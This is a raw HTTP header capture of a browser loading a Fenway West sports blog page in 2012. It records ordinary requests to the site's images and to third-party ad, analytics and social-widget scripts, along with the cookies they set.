GET /TagPublish/getjs.aspx?01AD=3qUE0LMwcKDqHRNhBNHv0tfDYCqt2suH9bbQXkecqd-cVAGhSLg-Ugg&amp;01RI=6A2D91A46D43ACC&amp;01NA=na&amp;action=VIEWAD&amp;cwrun=200&amp;cwadformat=728X90&amp;cwpid=520266&amp;cwwidth=728&amp;cwheight=90&amp;cwpnet=1&amp;cwtagid=66900 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=CT-1; cw=cw
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: GlassFish v3
P3P: policyref=&quot;/TagPublish/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;, policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Etag: 64260b9d0554e47b33aad47950ff507b7c7477d9
Cache-Control: max-age=60, public, must-revalidate
Content-Encoding: UTF-8
Date: Sun, 18 Nov 2012 01:30:35 GMT
Content-Length: 8937
Connection: keep-alive
Set-Cookie: C2W4=CT-USR; expires=Sun, 16-Dec-2012 01:30:35 GMT; path=/; domain=.contextweb.com cw=cw;Version=1;Comment=;Domain=.contextweb.com;Path=/;Max-Age=10000
GET /curation/maintop/thumbimages/johnny-manziel-texas-am.jpg HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Mon, 12 Nov 2012 22:57:24 GMT
Etag: &quot;804cdb-1c697-4ce54397e5d00&quot;
Accept-Ranges: bytes
Content-Length: 116375
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /quant.js HTTP/1.1

Host: edge.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: Apache
Last-Modified: Fri, 16 Nov 2012 21:56:51 GMT
Accept-Ranges: bytes
Content-Length: 2386
Content-Encoding: gzip
Cache-Control: private, max-age=86400
Expires: Mon, 19 Nov 2012 01:30:36 GMT
Date: Sun, 18 Nov 2012 01:30:36 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /templates/yoo_bigeasy/images/background.jpg HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Sun, 18 Nov 2012 01:30:36 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Tue, 23 Oct 2012 02:26:23 GMT
Etag: &quot;ecd4d9-28a-4ccb0b23571c0&quot;
Accept-Ranges: bytes
Content-Length: 650
Keep-Alive: timeout=5, max=494
Connection: Keep-Alive
GET /delivery/rta/rta.js?netId=1926&cookieName=cto_rtt&rnd=2341365806&varName=crtg_content HTTP/1.1

Host: rtax.criteo.com
GET /delivery/rta/rta.js?netId=1926&amp;cookieName=cto_rtt&amp;rnd=2341365806&amp;varName=crtg_content HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/7.5
Set-Cookie: uid=3f7f1b71-916c-48bc-bcf3-047d4d79ab62; domain=.criteo.com; expires=Mon, 18-Nov-2013 01:30:35 GMT; path=/
Date: Sun, 18 Nov 2012 01:30:35 GMT
Content-Length: 201
Vary: Accept-Encoding
GET /js/counter.asp?site=s27fenwaywest HTTP/1.1

Host: s27.sitemeter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Sun, 18 Nov 2012 01:30:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7346
Expires: Sun, 18 Nov 2012 01:30:25 GMT
Set-Cookie: IP=195%2E159%2E140%2E222; path=/
Cache-Control: private
GET /js/counter.asp?site=s52bloguinbaseball HTTP/1.1

Host: s21.sitemeter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Sun, 18 Nov 2012 01:30:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7356
Expires: Sun, 18 Nov 2012 01:30:25 GMT
Set-Cookie: IP=195%2E159%2E140%2E222; path=/
Cache-Control: private
GET /curation/maintop/thumbimages/espn%20magnifying.jpg HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Sun, 18 Nov 2012 01:30:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 15 Nov 2012 21:52:17 GMT
Etag: &quot;80527f-35746-4ce8faa246640&quot;
Accept-Ranges: bytes
Content-Length: 218950
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /connect/xd_arbiter.php?version=17 HTTP/1.1

Host: static.ak.facebook.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
X-FB-Debug: QpUXNDPC4a/ZS9XMuzc2WDBWEZ8S2oHPsfImau8uouU=
Content-Length: 9847
Vary: Accept-Encoding
Cache-Control: public, max-age=30852395
Expires: Sun, 10 Nov 2013 03:37:11 GMT
Date: Sun, 18 Nov 2012 01:30:36 GMT
Connection: keep-alive
GET /pixel;r=350526864;a=p-a3g2Mplggde4A;labels=FenwayWest.AllSports;fpan=1;fpa=P0-1017690683-1353202236609;ns=1;ce=1;je=1;sr=1176x885x24;enc=n;dst=1;et=1353202236608;tzo=-60;ref=http%3A%2F%2Fwww.shinynylonarts.com%2F;url=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php;ogl=description.%2Cimage.http%3A%2F%2Fwww%252Efenwaywest%252Ecom%2Fmodules%2Fmod_raxo_allmode%2Ftools%2Fplaceholder%252Epng%2Curl.http%3A%2F%2Fwww%252Efenwaywest%252Ecom%2Fsh404sef-custom-content%2F404%252Ehtml%2Ctitle.__404__%2Clocale.en_US%2Csite_name.Fenway%20West HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Set-Cookie: mc=50a83a3c-b2d37-9dbcd-25149; expires=Tue, 20-May-2014 01:30:36 GMT; path=/; domain=.quantserve.com
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV&quot;
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Sun, 18 Nov 2012 01:30:36 GMT
Server: QS
GET /beacon.js?c1=2&c2=6036378&c3=&c4=&c5=&c6=&c10= HTTP/1.1

Host: b.scorecardresearch.com
GET /beacon.js?c1=2&amp;c2=6036378&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c10= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Expires: Sun, 02 Dec 2012 01:30:38 GMT
Date: Sun, 18 Nov 2012 01:30:38 GMT
Content-Length: 1190
Connection: keep-alive
Cache-Control: private, no-transform, max-age=1209600
GET /unica/ntpagetag.js HTTP/1.1

Host: www.yardbarker.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: nginx/1.0.15
Last-Modified: Tue, 25 Sep 2012 18:48:47 GMT
Content-Encoding: gzip
Content-Length: 3951
Vary: Accept-Encoding
Date: Sun, 18 Nov 2012 01:30:38 GMT
Connection: keep-alive
X-N: S
GET /b?c1=2&c2=6036378&c3=&c4=&c5=&c6=&c10=&c15=&c16=&r=&ns__t=1353202238737&ns_c=UTF-8&c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&c9=http%3A%2F%2Fwww.shinynylonarts.com%2F HTTP/1.1

Host: b.scorecardresearch.com
GET /b?c1=2&amp;c2=6036378&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c10=&amp;c15=&amp;c16=&amp;r=&amp;ns__t=1353202238737&amp;ns_c=UTF-8&amp;c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;c9=http%3A%2F%2Fwww.shinynylonarts.com%2F HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://b.scorecardresearch.com/b2?c1=2&amp;c2=6036378&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c10=&amp;c15=&amp;c16=&amp;r=&amp;ns__t=1353202238737&amp;ns_c=UTF-8&amp;c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;c9=http%3A%2F%2Fwww.shinynylonarts.com%2F
Date: Sun, 18 Nov 2012 01:30:38 GMT
Connection: keep-alive
Set-Cookie: UID=546eda-195.159.219.9-1353202238; expires=Sat, 08-Nov-2014 01:30:38 GMT; path=/; domain=.scorecardresearch.com UIDR=1353202238; expires=Sat, 08-Nov-2014 01:30:38 GMT; path=/; domain=.scorecardresearch.com
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /b2?c1=2&c2=6036378&c3=&c4=&c5=&c6=&c10=&c15=&c16=&r=&ns__t=1353202238737&ns_c=UTF-8&c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&c9=http%3A%2F%2Fwww.shinynylonarts.com%2F HTTP/1.1

Host: b.scorecardresearch.com
GET /b2?c1=2&amp;c2=6036378&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c10=&amp;c15=&amp;c16=&amp;r=&amp;ns__t=1353202238737&amp;ns_c=UTF-8&amp;c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;c9=http%3A%2F%2Fwww.shinynylonarts.com%2F HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: UID=546eda-195.159.219.9-1353202238; UIDR=1353202238
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 18 Nov 2012 01:30:38 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /_/apps-static/_/js/gapi/plusone/rt=j/ver=ZmauHrJi-hM.no./sv=1/am=!lVF6vhgpQzaIV3w7gg/d=1/rs=AItRSTMTSuKxtbCl7AXnY1-y8dTDnN-tCQ/cb=gapi.loaded_0 HTTP/1.1

Host: apis.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Etag: &quot;180778605&quot;
Expires: Sun, 16 Dec 2012 23:09:58 GMT
Date: Fri, 16 Nov 2012 23:09:58 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 26210
Age: 94840
GET /connect/xd_arbiter.php?version=17 HTTP/1.1

Host: s-static.ak.facebook.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
X-FB-Debug: JS4qOSg1Dl3AgVtg3MyBP4whcr8SZapA/Vud9cBlDwY=
Content-Length: 9847
Vary: Accept-Encoding
Cache-Control: public, max-age=30852365
Expires: Sun, 10 Nov 2013 03:36:43 GMT
Date: Sun, 18 Nov 2012 01:30:38 GMT
Connection: keep-alive
GET /ntpagetag.gif?js=1&ts=1353202238777.878&lc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&rf=http%3A%2F%2Fwww.shinynylonarts.com%2F&rs=1176x885&cd=24&ln=en&tz=GMT%20%2B01%3A00&jv=1&site=9859_fenway_west&account=yardbarkernetwork HTTP/1.1

Host: pt200191.unica.com
GET /ntpagetag.gif?js=1&amp;ts=1353202238777.878&amp;lc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;rf=http%3A%2F%2Fwww.shinynylonarts.com%2F&amp;rs=1176x885&amp;cd=24&amp;ln=en&amp;tz=GMT%20%2B01%3A00&amp;jv=1&amp;site=9859_fenway_west&amp;account=yardbarkernetwork HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache
Last-Modified: Tue, 30 Jan 2007 21:58:48 GMT
Etag: &quot;2fd8ed-55-42849193d1600&quot;
Accept-Ranges: bytes
Content-Length: 85
Expires: Sun, 18 Nov 2012 01:30:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 18 Nov 2012 01:30:38 GMT
Connection: keep-alive
GET /s2/oz/images/stars/po/Publisher/sprite4-a67f741843ffc4220554c34bd01bb0bb.png HTTP/1.1

Host: ssl.gstatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Thu, 13 Sep 2012 21:47:55 GMT
Date: Fri, 16 Nov 2012 11:57:54 GMT
Expires: Sat, 16 Nov 2013 11:57:54 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 21399
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 135165
GET /cgi-bin/m?ci=us-603545h&cg=0&cc=1&si=http%3A//fenwaywest.com/media/index.php&rp=http%3A//www.shinynylonarts.com/&ts=compact&rnd=1353202238739 HTTP/1.1

Host: secure-us.imrworldwide.com
GET /cgi-bin/m?ci=us-603545h&amp;cg=0&amp;cc=1&amp;si=http%3A//fenwaywest.com/media/index.php&amp;rp=http%3A//www.shinynylonarts.com/&amp;ts=compact&amp;rnd=1353202238739 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Sun, 18 Nov 2012 01:30:39 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: V5=AStfNyITfj9WEhowMBgjIyFZHw4AAVInHlKVyA__; expires=Tue, 18-Nov-2014 01:30:39 GMT; domain=.imrworldwide.com; path=/cgi-bin IMRID=UKg6P4psDxwAAH-Wabc; expires=Tue, 18-Nov-2014 01:30:39 GMT; path=/cgi-bin; domain=.imrworldwide.com
Location: http://secure-us.imrworldwide.com/cgi-bin/m1?ci=us-603545h&amp;cg=0&amp;cc=1&amp;si=http%3A//fenwaywest.com/media/index.php&amp;rp=http%3A//www.shinynylonarts.com/&amp;ts=compact&amp;rnd=1353202238739&amp;ja=1
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref=&quot;http://www.imrworldwide.com/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID PSA ADM OUR IND UNI NAV COM&quot;
GET /cgi-bin/m1?ci=us-603545h&cg=0&cc=1&si=http%3A//fenwaywest.com/media/index.php&rp=http%3A//www.shinynylonarts.com/&ts=compact&rnd=1353202238739&ja=1 HTTP/1.1

Host: secure-us.imrworldwide.com
GET /cgi-bin/m1?ci=us-603545h&amp;cg=0&amp;cc=1&amp;si=http%3A//fenwaywest.com/media/index.php&amp;rp=http%3A//www.shinynylonarts.com/&amp;ts=compact&amp;rnd=1353202238739&amp;ja=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: V5=AStfNyITfj9WEhowMBgjIyFZHw4AAVInHlKVyA__; IMRID=UKg6P4psDxwAAH-Wabc
HTTP/1.1 200 OK

Content-Type: image/gif
Server: nginx
Date: Sun, 18 Nov 2012 01:30:39 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref=&quot;http://www.imrworldwide.com/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID PSA ADM OUR IND UNI NAV COM&quot;
GET /adj/yb.fenwaywest/;chan1=mlb;rating=pg;dcopt=ist;yb=ad;s1=;s2=;tile=1;sz=728x90;ord=885814905? HTTP/1.1

Host: ad.doubleclick.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=UTF-8
Server: DCLK-AdSvr
Content-Length: 1276
Content-Encoding: gzip
Date: Sun, 18 Nov 2012 01:30:39 GMT
GET /pagead/adview?ai=CinPfPjqoULnMPLLO0AHKooGgC6rN7MACooHlsDCSz9DTYxABIABQgMfhxARgw_ShhZAYggEXY2EtcHViLTcyNzk0MTAwNDgwMjQyNDjIAQmoAwGqBGVP0KwDUp0M_2fm-8n6DVTIkXKSeYKBWAwOLQOukqTMkn86OHEEmpNkMk6s5e1B6_vXpEkHKd9_UcVTAyiiLpv6ts3_xc5YXU4RtLUsb8AqMFrNUX23NNc3VsQJ9aShhr2ccwcCqoAG0Iiz1YTsgqv0AQ&sigh=cWb_gQbmemY HTTP/1.1

Host: adx.g.doubleclick.net
GET /pagead/adview?ai=CinPfPjqoULnMPLLO0AHKooGgC6rN7MACooHlsDCSz9DTYxABIABQgMfhxARgw_ShhZAYggEXY2EtcHViLTcyNzk0MTAwNDgwMjQyNDjIAQmoAwGqBGVP0KwDUp0M_2fm-8n6DVTIkXKSeYKBWAwOLQOukqTMkn86OHEEmpNkMk6s5e1B6_vXpEkHKd9_UcVTAyiiLpv6ts3_xc5YXU4RtLUsb8AqMFrNUX23NNc3VsQJ9aShhr2ccwcCqoAG0Iiz1YTsgqv0AQ&amp;sigh=cWb_gQbmemY HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
X-Content-Type-Options: nosniff
Date: Sun, 18 Nov 2012 01:30:39 GMT
Server: cafe
Content-Length: 0
X-XSS-Protection: 1; mode=block
GET /templates/yoo_bigeasy/images/menu_dropdown_level1.png HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.fenwaywest.com/templates/yoo_bigeasy/css/menus.css
Cookie: __qca=P0-1017690683-1353202236609; cto_rtt=; UnicaNIODID=LHSBVeW0yKx-XzFAqs9
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sun, 18 Nov 2012 01:30:39 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 28 Jun 2012 12:19:54 GMT
Etag: &quot;eccb25-49-4c387595b4e80&quot;
Accept-Ranges: bytes
Content-Length: 73
Keep-Alive: timeout=5, max=495
Connection: Keep-Alive
